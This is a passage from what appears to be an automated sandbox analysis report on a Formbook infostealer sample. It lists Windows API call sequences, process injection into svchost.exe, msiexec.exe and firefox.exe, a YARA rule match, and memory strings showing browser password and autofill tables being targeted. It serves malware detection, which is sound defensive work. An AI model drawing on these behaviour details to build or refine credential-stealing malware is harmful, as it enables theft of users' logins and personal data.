            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2CD0 NtEnumerateKey,3_2_051E2CD0
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2F30 NtOpenDirectoryObject,3_2_051E2F30
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2FB0 NtSetValueKey,3_2_051E2FB0
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2E80 NtCreateProcessEx,3_2_051E2E80
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2EB0 NtProtectVirtualMemory,3_2_051E2EB0
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2EC0 NtQuerySection,3_2_051E2EC0
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E29D0 NtWaitForSingleObject,3_2_051E29D0
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2B10 NtAllocateVirtualMemory,3_2_051E2B10
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2B00 NtQueryValueKey,3_2_051E2B00
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2B20 NtQueryInformationProcess,3_2_051E2B20
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2BE0 NtQueryVirtualMemory,3_2_051E2BE0
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2AA0 NtQueryInformationFile,3_2_051E2AA0
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E2AC0 NtEnumerateValueKey,3_2_051E2AC0
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E3C30 NtOpenProcessToken,3_2_051E3C30
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_051E3C90 NtOpenThread,3_2_051E3C90
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 3_2_054CEEFE NtQueryInformationProcess,3_2_054CEEFE
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_00434D50: GetFullPathNameW,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_004461ED DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_0537969A2_2_0537969A
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_053779432_2_05377943
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_053798C32_2_053798C3
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_053983D32_2_053983D3
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0527A5263_2_0527A526
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B04453_2_051B0445
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052667573_2_05266757
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051BA7603_2_051BA760
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B27603_2_051B2760
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051CC6003_2_051CC600
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051D46703_2_051D4670
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B06803_2_051B0680
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526A6C03_2_0526A6C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051AC6E03_2_051AC6E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0527010E3_2_0527010E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0525E0763_2_0525E076
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051A00A03_2_051A00A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051BE3103_2_051BE310
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051722453_2_05172245
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051AAD003_2_051AAD00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B0D693_2_051B0D69
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051C2DB03_2_051C2DB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0522EC203_2_0522EC20
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051A0C123_2_051A0C12
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051BAC203_2_051BAC20
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526EC603_2_0526EC60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05266C693_2_05266C69
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0525EC4C3_2_0525EC4C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051C8CDF3_2_051C8CDF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0527ACEB3_2_0527ACEB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051BCF003_2_051BCF00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526EFBF3_2_0526EFBF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B6FE03_2_051B6FE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05250E6D3_2_05250E6D
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051D0E503_2_051D0E50
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051F2E483_2_051F2E48
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05260EAD3_2_05260EAD
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051A2EE83_2_051A2EE8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526E9A63_2_0526E9A6
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051AE9A03_2_051AE9A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051DE8103_2_051DE810
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052508353_2_05250835
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051968683_2_05196868
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051C68823_2_051C6882
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0524C89F3_2_0524C89F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B28C03_2_051B28C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B0B103_2_051B0B10
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05224BC03_2_05224BC0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526CA133_2_0526CA13
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526EA5B3_2_0526EA5B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05252AC03_2_05252AC0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051F55503_2_051F5550
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052675C63_2_052675C6
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526F5C93_2_0526F5C9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0521D4803_2_0521D480
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052454903_2_05245490
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052516233_2_05251623
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0524D62C3_2_0524D62C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0525D6463_2_0525D646
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052236EC3_2_052236EC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526F6F63_2_0526F6F6
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0519F1133_2_0519F113
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0524D1303_2_0524D130
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052791433_2_05279143
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051F717A3_2_051F717A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B51C03_2_051B51C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051CB1E03_2_051CB1E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051E508C3_2_051E508C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051BB0D03_2_051BB0D0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052670F13_2_052670F1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526F3303_2_0526F330
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051A13803_2_051A1380
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526124C3_2_0526124C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0519D2EC3_2_0519D2EC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526FD273_2_0526FD27
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05263D223_2_05263D22
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05267D4C3_2_05267D4C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B9DD03_2_051B9DD0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0524FDF43_2_0524FDF4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B3C603_2_051B3C60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05249C983_2_05249C98
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05237CE83_2_05237CE8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051CFCE03_2_051CFCE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526FF633_2_0526FF63
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0522FF403_2_0522FF40
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05253FA03_2_05253FA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05261FC63_2_05261FC6
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B1EB23_2_051B1EB2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05269ED23_2_05269ED2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051F59C03_2_051F59C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051799E83_2_051799E8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B38003_2_051B3800
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052258703_2_05225870
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526F8723_2_0526F872
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051B98703_2_051B9870
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051CB8703_2_051CB870
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052298B23_2_052298B2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052678F33_2_052678F3
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_052618DA3_2_052618DA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051EDB193_2_051EDB19
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526FB2E3_2_0526FB2E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05241B803_2_05241B80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0526FA893_2_0526FA89
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051CFAA03_2_051CFAA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_054CEEFE3_2_054CEEFE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_054CE4AD3_2_054CE4AD
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_054CD7483_2_054CD748
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_054CE6DC3_2_054CE6DC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_054CE3433_2_054CE343
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_054CE2243_2_054CE224
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_054CC9E33_2_054CC9E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487BE4 appears 101 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AE692 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BEF10 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475050 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B910 appears 275 times
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: String function: 00445975 appears 65 times
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: String function: 0041171A appears 37 times
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: String function: 0041718C appears 45 times
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: String function: 0040E6D0 appears 35 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 051E5050 appears 58 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0522EF10 appears 105 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 051F7BE4 appears 111 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0519B910 appears 280 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0521E692 appears 86 times
            Source: p4rsJEIb7k.exe, 00000000.00000003.4327019782.0000000004EDD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs p4rsJEIb7k.exe
            Source: p4rsJEIb7k.exe, 00000000.00000003.4319939147.0000000004D33000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs p4rsJEIb7k.exe
            Source: p4rsJEIb7k.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            The rule matched in each of the following sources:
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000002.00000002.9381714381.00000000050A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: 00000001.00000002.4813936087.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000003.00000002.8170470399.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000001.00000002.4815096590.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@18/12
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_0044AF5C GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,CoCreateInstanceEx,CoSetProxyBlanket
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_0043614F FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe File created: C:\Users\user\AppData\Local\Temp\gobioid
            Source: p4rsJEIb7k.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: msiexec.exe, 00000003.00000003.4995883349.0000000008230000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8172567571.0000000008239000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
            Source: msiexec.exe, 00000003.00000003.4994416168.0000000003372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4989398688.0000000003372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4989236920.0000000003352000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4992897675.0000000003372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8169483298.0000000003372000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: msiexec.exe, 00000003.00000003.4999748750.0000000008293000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8172567571.000000000829F000.00000004.00000020.00020000.00000000.sdmp, -f1ZI14.3.dr Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
            Source: p4rsJEIb7k.exe ReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe File read: C:\Users\user\Desktop\p4rsJEIb7k.exe
            Source: unknown Process created: C:\Users\user\Desktop\p4rsJEIb7k.exe "C:\Users\user\Desktop\p4rsJEIb7k.exe"
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\p4rsJEIb7k.exe"
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Section loaded: apphelp.dll, wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, userenv.dll, edgegdi.dll, uxtheme.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edgegdi.dll
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe Section loaded: apphelp.dll, wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, edgegdi.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\msiexec.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: p4rsJEIb7k.exe Static file information: File size 1335565 > 1048576
            Source: Binary string: msiexec.pdb source: svchost.exe, 00000001.00000003.4781384098.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4781220236.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, BlltrVxNMs.exe, 00000002.00000003.4880463662.0000000001335000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: msiexec.pdbGCTL source: svchost.exe, 00000001.00000003.4781384098.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4781220236.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, BlltrVxNMs.exe, 00000002.00000003.4880463662.0000000001335000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BlltrVxNMs.exe, 00000002.00000000.4736161942.0000000000ABE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: p4rsJEIb7k.exe, 00000000.00000003.4325817635.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, p4rsJEIb7k.exe, 00000000.00000003.4326551260.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4724121009.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.4814046744.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.4814046744.000000000352D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4721063151.0000000003000000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4812614041.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8170719186.0000000005170000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8170719186.000000000529D000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4816265673.0000000004FC1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: p4rsJEIb7k.exe, 00000000.00000003.4325817635.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, p4rsJEIb7k.exe, 00000000.00000003.4326551260.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.4724121009.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.4814046744.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.4814046744.000000000352D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4721063151.0000000003000000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000003.00000003.4812614041.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8170719186.0000000005170000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8170719186.000000000529D000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4816265673.0000000004FC1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: BlltrVxNMs.exe, 00000002.00000002.9389382295.000000000578C000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.000000000584C000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8169483298.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.00000000298EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: BlltrVxNMs.exe, 00000002.00000002.9389382295.000000000578C000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.000000000584C000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8169483298.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.00000000298EC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: p4rsJEIb7k.exeStatic PE information: real checksum: 0xa2135 should be: 0x15058a
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041197A push ecx; retf 1_2_0041197D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00407227 push cs; ret 1_2_0040723E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040AB29 pushad ; retf 1_2_0040AB2A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183C4 push ss; retf 1_2_004183CE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403380 push eax; ret 1_2_00403382
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D45D push B7E85DDEh; ret 1_2_0040D462
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414412 push edx; iretd 1_2_0041441B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417F74 pushfd ; ret 1_2_00417F75
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040CF38 push ecx; retf 1_2_0040CF3E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034021AD pushad ; retf 0004h1_2_0340223F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034308CD push ecx; mov dword ptr [esp], ecx1_2_034308D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034097A1 push es; iretd 1_2_034097A8
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015D315A push esp; ret 2_2_015D315B
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015BE937 push es; iretd 2_2_015BE957
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015BE83C push es; iretd 2_2_015BE957
